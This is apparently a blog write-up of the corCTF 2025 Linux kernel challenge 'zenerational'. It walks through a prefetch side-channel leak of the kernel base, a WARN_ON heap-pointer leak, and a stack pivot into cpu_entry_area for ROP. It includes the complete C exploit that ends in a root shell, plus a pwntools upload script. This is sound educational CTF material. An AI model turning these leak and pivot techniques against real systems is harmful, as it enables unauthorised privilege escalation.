Learn cpu_entry_area with corCTF 2025 "zenerational"

Using the (randomized) cpu_entry_area to do stack pivot and ROP in x86_64 Linux kernel.

Before everything started

At the very end of this August I played corCTF with P1G SEKAI and solved some reverse and crypto chals, however as a newcomer of kernel pwn I was completely cooked by all these fantastic kernel chals. My teammates eventually managed to solve one of the three Linux LPEs. I decided to review those chals and take some notes after the competition ended.

(But it turns out there were so many great CTF events in September and now I finally finished Flare-on 12 and some time to write this up)

In short…

corCTF 2025 had a Linux kernel chals named “zenerational”, which clears values on the current kernel stack region and directly gives you control of RIP.

(Here, $rax == $rip is fully controlled, and $rdi == $rsi is also fully controlled)

Since the saved pt_regs structure on stack is cleared, one solution is pivoting kernel stack to cpu_entry_area which has a memory fully controlled by user with 120 bytes long.

However, after google project zero introduced cpu_entry_area pivot in Dec 2022 and assigned CVE-2023-3640 / CVE-2023-3640, the virtual address of cpu_entry_area is now randomized.

Although we can use prefetch side channel to leak KASLR of .text section, we don’t find any usable solution to leak randomized cpu_entry_area.
To get the address of cpu_entry_area, the solution provided by kqx is exploit WARN_ON_ONCE in page fault handler to get debug print and leak some heap address (then we can infer the base address of phys_map).

Why phys_map? @kqx pointed out cpu_entry_area has fixed physical address so from phys_map we now have the virtual address of cpu_entry_area in the linear mapping area and ready to pivot the stack!

After using kropr to search gadgets, I found the following one:

1
2
0xffffffff81605e07 
push rsi; or [rbx+0x41], bl; pop rsp; pop r13; pop r14; pop rbp; ret

In short we will do the followings:

  • Use prefetch to leak KASLR
  • Use WARN_ON_ONCE to leak phys_map
  • Pivot stack to cpu_entry_area, do commit_creds(&init_cred) and return to user mode to finish privilege escalation.

Full review writeup

Starting from a control flow hijack

The “zenerational” of corCTF 2025 introduces a patch on Linux 6.17.0-rc1:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
+SYSCALL_DEFINE2(corctf_crash, uint64_t, addr, uint64_t, val)
+{
+ register uint64_t reg_val = val;
+ register void (*rip)(uint64_t) = (void (*)(uint64_t))addr;
+ asm volatile(".intel_syntax noprefix;"
+ "mov r8, rsp;"
+ "add r8, 0x100;"
+ "mov r9, 0xff;"
+ "not r9;"
+ "and r8, r9;"
+ "mov rcx, r8;"
+ "sub ecx, esp;"
+ "mov rdi, rsp;"
+ "rep stosb;"
+ ".att_syntax prefix;"
+ :::"rcx","rdi","r8","r9","memory","cc");
+ rip(reg_val);
+ __builtin_unreachable();
+}

This will give us arbitrary indirect call with fully controlled first argument rip(reg_val) after erasing the entire kernel stack.

When we have a PC control on the latest (6.x) Linux, we might consider:

  • (X) RetSpill, which is a general version of ret2pt_regs, but in this challenge the entire stack is erased so this will not work. (RetSpill also requires panic_on_oops disabled to brute the weak random pt_regs offset but panic_on_oops was also set as enabled in the challenge environment).
  • (X) Ret2BPF, which is extremely powerful because it can achieve LPE with a leakless Control-Flow-Hijack. But BPF is not enabled on the challenge environment.
  • (X) KEPLER, which requires specific copy_to_user and copy_from_user gadgets to leak canary and start ROP, however the stack is erased so we can no longer leak the canary. (It also requires phys_map leak sometimes).
  • (?) cpu_entry_area pivot, it seems one of the few remaining options is to pivot the stack to somewhere we control and whose address we know, cpu_entry_area is a good place whose contents we can fully control (up to ~120 bytes), but as we just mentioned, the virtual address of cpu_entry_area is randomized since 2023, so we have to find the way to leak its address if we want to use it.

KASLR leaks

kernel .text base

Thanks to the great architecture hackers, now all Linux kernel runs on real x86_64 CPUs are vulnerable of side channel mapping probes which can eventually leak KASLR easily.
And @will found those leaks (at least kernel .text segment leak) work perfectly even under KPTI enabled.

Randomized address of cpu_entry_area (strong)

However, the cpu_entry_area is randomized by randomly select CPU slot numbers with high entropy:

1
MAX_CEA = (1<<39)-4096)//0x3b000 = 0x22b63c

And the final virtual address of cpu_entry_area(cpuid) is calculated with:

1
(*(long*)((__per_cpu_start + *(long*)(__per_cpu_offset + cpuid*8)))) * 0x3b000 + 0xfffffe0000001000 + 0x1f58

(If ASLR is disabled, the (*(long*)((__per_cpu_start + *(long*)(__per_cpu_offset + cpuid*8)))) = cpuid)

Probing entire 0x22b63c will cost more than half an hour and not feasible to get a correct result.
In fact, even just probing 0x6200 possible phys_map base address with prefetch is not guaranteed to get a stable result.

1
(0xffffa10000000000 - 0xffff888000000000) // 0x40000000 = 0x6200

Image: I randomly pick some unmapped addresses and compare there prefetch time with the really mapped address with KPTI disabled, and the time cost has basically no difference. Perhaps I use the side channel in the wrong way.

As the result, the new added virtual address randomization for cpu_entry_area is strong enough and cosidered as safe (for now).

Randomized address of cpu_entry_area (weak)

After the CTF ends, @kqx shared the amazing fact that cpu_entry_area has fixed physical address so it always has certain offset relative to phys_map.

This means even the original address of cpu_entry_area is safely randomized, there exists a second map of the each same cpu_entry_area in linear mapping with fixed offset.
(For the same memory image, the fixed offset may vary with the memory size and bootloader, but you may easily infer the offset with vmmap on bata24 gef and check the physical address of the cpu_entry_area).

Here is the physical offsets using the challenge boot script under different memory limits:

1
2
3
4
5
6
7
8
  cea(0)       cea(1)     mem
3bc13fc0 -> 13bd13fc0 for 4 G
// direct map differ a lot when mem is crossing 3.5G boundary
7dc13fc0 -> 7de13fc0 for 2 G
3ec13fc0 -> 3ed13fc0 for 1 G
1f413fc0 -> 1f513fc0 for 512 M
// 0xffff888003c00000-0xffff888004000000 0x0000000003c00000-0x0000000004000000
// 0x400000 0x200000 2 [RW- KERN ACCESSED DIRTY]

Under the default config of 4-layer-PageTable Linux system, when KASLR is enabled, the phys_map is randomized with PUD_SIZE (0x40000000) as offset unit.

And as we know, in Linux kernel, heap virtual addresses are on the linear mapping (phys_map), so leaking any heap pointers (before we exceed 1G memory / PUD_SIZE memory) can tell us the base of phys_map by simply bitwise and a ~(0x40000000 - 1)

Leak a kernel heap pointer with WARN_ON

In kqx’s exploit they uses entry_SYSRETQ_unsafe_stack to do swapgs; sysretq which requires rcx to be a valid canonical address and will later be use as user RIP.
And when Control-Flow-Hijack happens, rcx=0 which is valid and will trigger a page fault.

When page fault happens, if eflags (which is set to be 1 from R11 when sysret happens) is not 0, a WARN_ON_ONCE in page fault handler will be triggered and give us debug print with kernel heap addresses on regular registers and GS register.

Here is what we may have once we trigger a WARN_ON(_ONCE):

It won’t crash the kernel since the thing only went wrong after we fully returned to users pace.

To read the debug print, we need either be able to read kernel logs (e.g. though dmesg, while the dmesg_restrict here is enabled), or our console log level need to be at least 5, and here we find we have log level as 7.
This varies from distributions, but 7 is not that rare in the real world as well.

Kernel ROP

Now that we have the other virtual address of cpu_entry_area = heap_pointer_leak & (~(0x40000000 - 1)) + fixed_offset, we are ready to pivot the stack and do some ROP.

By the way, I just learned the legendary figures who first invented ROP on 2007 (wait, ROP is only 18 years old) was teaching in UCSD and seems now in UT Austin working on JIT hacking.

Gadget finding

The kernel may modify page permissions, so tools that simply scan binaries for instruction patterns (like ROPGadget) can produce many false positives by disassembling data/constants as if they were executable code.

One solution is to manually specify the virtual address of the kernel executable segment for these tools. Another simpler solution is to use a tool designed for the kernel like kropr.

Note that for efficiency, kropr searches for a very short gadget by default (6 instructions max). You can consider increasing the range appropriately to obtain more candidates.

Note that new $rax == $rip is fully controlled, and $rdi == $rsi is also fully controlled.

After a little filtering, we may find this pivot gadget with 7 instructions:

1
2
0xffffffff81605e07 
push rsi; or [rbx+0x41], bl; pop rsp; pop r13; pop r14; pop rbp; ret

Pivot to cpu_entry_area

We can save all 15 regular registers to cpu_entry_area by triggering a divide error, here is a template from kctf writeup:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
struct cpu_entry_area_payload {
uint64_t regs[16];
};

static void sig_handler(int s) {}

static __attribute__((noreturn)) void write_cpu_entry_area(void* payload) {
asm volatile (
"mov %0, %%rsp\n"
"pop %%r15\n"
"pop %%r14\n"
"pop %%r13\n"
"pop %%r12\n"
"pop %%rbp\n"
"pop %%rbx\n"
"pop %%r11\n"
"pop %%r10\n"
"pop %%r9\n"
"pop %%r8\n"
"pop %%rax\n"
"pop %%rcx\n"
"pop %%rdx\n"
"pop %%rsi\n"
"pop %%rdi\n"
"divq (0x1234000)\n"
: : "r"(payload)
);
__builtin_unreachable();
}

// Fill the CPU entry area exception stack of HELPER_CPU with a
// struct cpu_entry_area_payload
static void setup_cpu_entry_area() {
if (fork()) {
return;
}

struct cpu_entry_area_payload payload = {};

// Setup payload here

set_affinity(0); // pin cpu
signal(SIGFPE, sig_handler);
signal(SIGTRAP, sig_handler);
signal(SIGSEGV, sig_handler);
setsid();

write_cpu_entry_area(&payload);
}

Return to user mode

In this challenge there is only one CPU core available so we can not let one core sleep infinty after changed mod_probpath or core_pattern while another core trigger the modprobe or coredump and wins.
(Besides, I don’t know whether this challenge have enabled the STATIC_SUERMODE_HELPER protection)

Thus, we will have to return to userland safely after we’ve done the privilege escalation.

Although prepare_creds(0) no longer returns a root cred after Linux 6.2, we can still use the global value init_cred as root cred and do commit_creds(&init_cred) to set the cred of our task_struct as root.

Since our ROP started with the pivot gadget push rsi; or [rbx+0x41], bl; pop rsp; pop r13; pop r14; pop rbp; ret, we can pivot to cpu_entry_area - 0x18 to pop the unused r13, r14, rbp before using our precious 15 * 8 controled bytes.

In this challenge, the KPTI is not enabled, so we can just use swapgs; iretq or swapgs; sysret to return to user mode.

The sysret resotores the user metadata from registers, so I use iretq which just requires setup everything on kernel stack:

1
2
3
4
5
6
7
8
9
10
payload.regs[i++] = kaslr_offset + 0xffffffff816e6a8d;  // pop rdi; ret; 
payload.regs[i++] = kaslr_offset + 0xffffffff820611a0; // init_cred
payload.regs[i++] = kaslr_offset + 0xffffffff812c7bc0; // commit_creds
payload.regs[i++] = kaslr_offset + 0xffffffff81ab584a; // swapgs; ret
payload.regs[i++] = kaslr_offset + 0xffffffff81ac20dd; // iretq
payload.regs[i++] = (size_t)&win; // rip
payload.regs[i++] = 0x33; // cs
payload.regs[i++] = 0x3206; // eflags
payload.regs[i++] = (((size_t)&payload) & (~0xf)) + 8; // rsp
payload.regs[i++] = 0x2b; // ss

We’ve done ROP with only 10 * 8 bytes, hooray!

When KPTI enabled

If we want to move one step further and enable KPTI, the only thing we need to do is swap PageTable before we switch to usermode.

Here I user the gadget from swapgs_restore_regs_and_return_to_usermode, started from the mov rdi, rsp; mov rsp,gs: part to skip register restoring part.

The only different here is we will need two extra element as user rax and rdi:

1
2
3
4
5
6
7
8
9
10
11
payload.regs[i++] = kaslr_offset + 0xffffffff816e6a8d;  // pop rdi;ret; 
payload.regs[i++] = kaslr_offset + 0xffffffff820611a0; // init_cred
payload.regs[i++] = kaslr_offset + 0xffffffff812c7bc0; // commit_creds
payload.regs[i++] = kaslr_offset + 0xffffffff81000f37; //swapgs_restore_regs_and_return_to_usermode -> mov rdi, rsp; mov rsp,gs: ...
payload.regs[i++] = 0; // fake rax
payload.regs[i++] = 0; // fake rdi
payload.regs[i++] = (size_t)&win; // rip
payload.regs[i++] = 0x33; // cs
payload.regs[i++] = 0x3206; // eflags
payload.regs[i++] = (((size_t)&payload) & (~0xf)) + 8; // rsp
payload.regs[i++] = 0x2b; // ss

Complete Exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
#define _GNU_SOURCE

#include <errno.h>
#include <fcntl.h>
#include <stdarg.h>
#include <stddef.h>
#include <stdint.h>
#include <syscall.h>
#include <stdint.h>
#include <sched.h>
#include <signal.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <unistd.h>


static inline __attribute__((always_inline))
long __raw_syscall(long n,
long a1, long a2, long a3,
long a4, long a5, long a6) {
register long rax __asm__("rax") = n;
register long rdi __asm__("rdi") = a1;
register long rsi __asm__("rsi") = a2;
register long rdx __asm__("rdx") = a3;
register long r10 __asm__("r10") = a4;
register long r8 __asm__("r8") = a5;
register long r9 __asm__("r9") = a6;
__asm__ volatile("syscall"
: "+a"(rax)
: "D"(rdi), "S"(rsi), "d"(rdx), "r"(r10), "r"(r8), "r"(r9)
: "rcx", "r11", "memory", "cc");
return rax;
}

/* ===== Small helpers for 0..6 args ===== */

#define __RS_HELPER_0(n) __raw_syscall((n), 0,0,0,0,0,0)
#define __RS_HELPER_1(n,a1) __raw_syscall((n),(long)(a1),0,0,0,0,0)
#define __RS_HELPER_2(n,a1,a2) __raw_syscall((n),(long)(a1),(long)(a2),0,0,0,0)
#define __RS_HELPER_3(n,a1,a2,a3) __raw_syscall((n),(long)(a1),(long)(a2),(long)(a3),0,0,0)
#define __RS_HELPER_4(n,a1,a2,a3,a4) __raw_syscall((n),(long)(a1),(long)(a2),(long)(a3),(long)(a4),0,0)
#define __RS_HELPER_5(n,a1,a2,a3,a4,a5) __raw_syscall((n),(long)(a1),(long)(a2),(long)(a3),(long)(a4),(long)(a5),0)
#define __RS_HELPER_6(n,a1,a2,a3,a4,a5,a6) __raw_syscall((n),(long)(a1),(long)(a2),(long)(a3),(long)(a4),(long)(a5),(long)(a6))

#define __RS_SELECT(_0,_1,_2,_3,_4,_5,_6,NAME,...) NAME

/* raw_syscall: returns raw kernel value (negative == -errno) */
#define raw_syscall(...) \
__RS_SELECT(__VA_ARGS__, \
__RS_HELPER_6, __RS_HELPER_5, __RS_HELPER_4, \
__RS_HELPER_3, __RS_HELPER_2, __RS_HELPER_1, \
__RS_HELPER_0) (__VA_ARGS__)

#include <sched.h>
#include <stdio.h>
#include <stdint.h>

#define ARRAY_LEN(x) (sizeof(x) / sizeof(x[0]))

size_t bypass_kaslr();

struct cpu_entry_area_payload {
uint64_t regs[16];
};

static void sig_handler(int s) {}

static __attribute__((noreturn)) void write_cpu_entry_area(void* payload) {
asm volatile (
"mov %0, %%rsp\n"
"pop %%r15\n"
"pop %%r14\n"
"pop %%r13\n"
"pop %%r12\n"
"pop %%rbp\n"
"pop %%rbx\n"
"pop %%r11\n"
"pop %%r10\n"
"pop %%r9\n"
"pop %%r8\n"
"pop %%rax\n"
"pop %%rcx\n"
"pop %%rdx\n"
"pop %%rsi\n"
"pop %%rdi\n"
"divq (0x1234000)\n"
: : "r"(payload)
);
__builtin_unreachable();
}

void set_affinity(int cpuid){
cpu_set_t my_set;
int cpu_cores = sysconf(_SC_NPROCESSORS_ONLN);

if (cpu_cores == 1) return;

CPU_ZERO(&my_set);

CPU_SET(cpuid, &my_set);

if (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {
perror("[-] sched_setaffinity()");
exit(EXIT_FAILURE);
}
}

void win(){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
printf("[!] Uid: %d\n", getuid());
system("id");
system("cat /root/flag.txt");
puts("Spawning shell");
system("/bin/sh");
}

size_t kaslr_offset = 0;

static void setup_cpu_entry_area() {
if (fork()) {
return;
}
// size_t user_cs, user_ss, user_rflags, user_sp;
struct cpu_entry_area_payload payload = {};

int i=0;
payload.regs[i++] = kaslr_offset + 0xffffffff816e6a8d; // pop rdi; ret;
payload.regs[i++] = kaslr_offset + 0xffffffff820611a0; // init_cred
payload.regs[i++] = kaslr_offset + 0xffffffff812c7bc0; // commit_creds
payload.regs[i++] = kaslr_offset + 0xffffffff81000f37; // swapgs_restore_regs_and_return_to_usermode -> mov rdi, rsp; mov rsp, gs:

payload.regs[i++] = 0; // fake rax
payload.regs[i++] = 0; // fake rdi
payload.regs[i++] = (size_t)&win; // rip
payload.regs[i++] = 0x33; // cs
payload.regs[i++] = 0x3206; // eflags
payload.regs[i++] = (((size_t)&payload) & (~0xf)) + 8; // rsp
payload.regs[i++] = 0x2b; // ss

payload.regs[i++] = 0; //
payload.regs[i++] = 0; //
payload.regs[i++] = 0; //
payload.regs[i++] = 0; // max 15 regs

set_affinity(0);
signal(SIGFPE, sig_handler);
signal(SIGTRAP, sig_handler);
signal(SIGSEGV, sig_handler);
setsid();

write_cpu_entry_area(&payload);
}

size_t flushandreload(void* addr);

int main(int argc, char **argv) {
setbuf(stdout, NULL);
setbuf(stderr, NULL);
setvbuf(stdout, 0, 2, 0);
setvbuf(stderr, 0, 2, 0);
set_affinity(0);
kaslr_offset = bypass_kaslr() - 0xffffffff81000000;
printf("Using kernel base %p\n", (void *)kaslr_offset + 0xffffffff81000000);

if (argc > 1) {
printf("Using kernel offset %p\n", (void *)kaslr_offset);
size_t page_offset_base = atol(argv[1]);
page_offset_base &= 0xffffffffc0000000;
printf("Using page base %p\n", (void *)page_offset_base);
size_t cea = page_offset_base + 0x7dc13f40; // 0x18: r13, r14, rbp
printf("using cea %p\n", (void *)cea);
setup_cpu_entry_area();
puts("!!!");
getchar();
// 0xffffffff81605e07 start with: push rsi; or [rbx+0x41], bl; pop rsp; pop r13; pop r14; pop rbp; ret
raw_syscall(470, kaslr_offset + 0xffffffff81605e07, cea);
} else {
raw_syscall(470, kaslr_offset + 0xffffffff810001ba, 0);
}
}

inline __attribute__((always_inline)) uint64_t rdtsc_begin() {
uint64_t a, d;
asm volatile ("mfence\n\t"
"RDTSCP\n\t"
"mov %%rdx, %0\n\t"
"mov %%rax, %1\n\t"
"xor %%rax, %%rax\n\t"
"lfence\n\t"
: "=r" (d), "=r" (a)
:
: "%rax", "%rbx", "%rcx", "%rdx");
a = (d<<32) | a;
return a;
}

inline __attribute__((always_inline)) uint64_t rdtsc_end() {
uint64_t a, d;
asm volatile(
"xor %%rax, %%rax\n\t"
"lfence\n\t"
"RDTSCP\n\t"
"mov %%rdx, %0\n\t"
"mov %%rax, %1\n\t"
"mfence\n\t"
: "=r" (d), "=r" (a)
:
: "%rax", "%rbx", "%rcx", "%rdx");
a = (d<<32) | a;
return a;
}


void prefetch(void* p) {
asm volatile (
"prefetchnta (%0)\n"
"prefetcht2 (%0)\n"
: : "r" (p));
}

size_t flushandreload(void* addr) { // row miss
size_t time = rdtsc_begin();
prefetch(addr);
size_t delta = rdtsc_end() - time;
return delta;
}


size_t bypass_kaslr() {
size_t base = 0;
#define OFFSET 8
#define START (0xffffffff81000000ull + OFFSET)
#define END (0xffffffffD0000000ull + OFFSET)
#define STEP 0x0000000000200000ull
#define NUM_TRIALS 11
while (1) {
size_t bases[NUM_TRIALS] = {0};
for (int vote = 0; vote < ARRAY_LEN(bases); vote ++) {
size_t times[(END - START) / STEP] = {};
uint64_t addrs[(END - START) / STEP];

for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
times[ti] = ~0;
addrs[ti] = START + STEP * (size_t)ti;
}

for (int i = 0; i < 16; i++) {
for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
size_t addr = addrs[ti];
size_t t = flushandreload((void*)addr);
if (t < times[ti]) {
times[ti] = t;
}
}
}

size_t minv = ~0;
size_t mini = -1;
for (int ti = 0; ti < ARRAY_LEN(times) - 1; ti++) {
if (times[ti] < minv) {
mini = ti;
minv = times[ti];
}
}

if (mini < 0) {
return -1;
}

bases[vote] = addrs[mini];
}

int c = 0;
for (int i = 0; i < ARRAY_LEN(bases); i++) {
if (c == 0) {
base = bases[i];
} else if (base == bases[i]) {
c++;
} else {
c--;
}
}

c = 0;
for (int i = 0; i < ARRAY_LEN(bases); i++) {
if (base == bases[i]) {
c++;
}
}
if (c > ARRAY_LEN(bases) / 2) {
base -= OFFSET;
break;
}
}
// base -= STEP;
return base;
}

I use this python script to upload and run the exploit:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
import os, base64, gzip
from pwn import *
from tqdm import tqdm
import subprocess

TMP_PATH = "/home/ctf"
SEP = b"ctf@corctf"


os.system("musl-gcc --static 1.c -o exploit")
with open("exploit", "rb") as f_in, gzip.open("exp.gz", "wb") as f_out:
f_out.write(f_in.read())

with open("exp.gz", "rb") as f:
exp = base64.b64encode(f.read())

# p = remote("remote", 11337)
p = process(['./run.sh'])

_ = p.recvuntil(SEP).decode()
for i in range(0, len(exp), 0x200):
p.sendline(b"echo -n \"" + exp[i:i + 0x200] + f"\" >> {TMP_PATH}/b64_exp".encode())

for i in tqdm(range(0, len(exp), 0x200)):
p.recvuntil(SEP)

p.sendline(b"ls")
p.sendlineafter(SEP, f"cat {TMP_PATH}/b64_exp | base64 -d > {TMP_PATH}/exp.gz".encode())
p.sendlineafter(SEP, f"gzip -dc {TMP_PATH}/exp.gz > {TMP_PATH}/exploit".encode())
p.sendlineafter(SEP, f"chmod +x {TMP_PATH}/exploit".encode())
p.sendlineafter(SEP, f"{TMP_PATH}/exploit".encode())
r = p.recvuntil(b'Segmentation fault').decode()
print(r)
leak = int(re.findall(r'R14: ([0-9a-f]+) R15: ', r)[0], 16)
print(f"leak: {hex(leak)}")
p.sendlineafter(SEP, f"{TMP_PATH}/exploit {leak}".encode())
print(p.recvuntil(b'!!!').decode())
p.sendline(b'whoami')
print(p.recvuntil(b'Spawning shell').decode())
p.interactive()

Now we have the root shell:

After Notes

The original challenge attachment can be downloaded at: https://github.com/Crusaders-of-Rust/corctf-2025-public-challenge-repo/tree/master/pwn/zenerational-aura

About randomization

Although cpu_entry_area is randomized, the read-only IDT at the begining of 0xfffffe0000000000 with 0x1000 length is still not randomized (and its maybe the few only address that not being randomized on the latest x86_64 Linux kernels at 2025).

Although the user should not able to control the value inside [0xfffffe0000000000, 0xfffffe0000001000), there are a lot of kernel functions pointers and null pointers on it and in 0xfffffe0000000164 we even have writeable kernel addresses.

Beside information leak (say we have an arb read but don’t know where to read), those fixed address may also useful for bypass some side-effects when we are dealing with other kernel exploits, for example:

Before we reach the code that can lead to Control-Flow-Hijack, there is a pointer dedeference that reqires target be writeable or be a nullptr. We must forge a valid pointer otherwise the kernel will crash / not execute vulnerable path.
Now with these function pointer, null pointer and writeable pointer on fixed address, those side-effects (constraints / restrictions) can be bypassed (satified) without any heap spray or information leak.

@kqx also provided some interesting discussion of cpu_entry_area.

About KPTI

@will showed that KPTI can not stop prefetch from leaking kernel .text address, even in user mode it is supposed to map only user pages and a few kernel codes (syscall entry, for example).

And after KPTI enabled, we can still leak debug print from WARN_ON_ONCE when we returned to usermode and accessing address 0 and trigger the page fault.

However, ret2usr is also no longer available after KPTI is enabled, although the kernel will still have the full mapping of user space program, every user page is marked as NX by KPTI.

This means even if we can disable SMEP, there is still a NX bit set to 1 that prevent us executing user shellcode in kernel mode.

What if we have more power to disable NXE (modifing EFER) for CPU? Well we still can not execute user shellcode since when NXE is disabled, all NX bit is considered as “resvered” by CPU and asserted to be zero, if NX = 1, the CPU will refuse to execute it even NXE is disabled.

However, if we can disable SMAP, we can still fetch data from user space, for example, do longer ROP.

References

Learn cpu_entry_area with corCTF 2025 "zenerational"

https://ghostfrankwu.github.io/2025/10/05/2025cor/

作者

Frank Wu

发布于

2025-10-05

更新于

2025-10-06

许可协议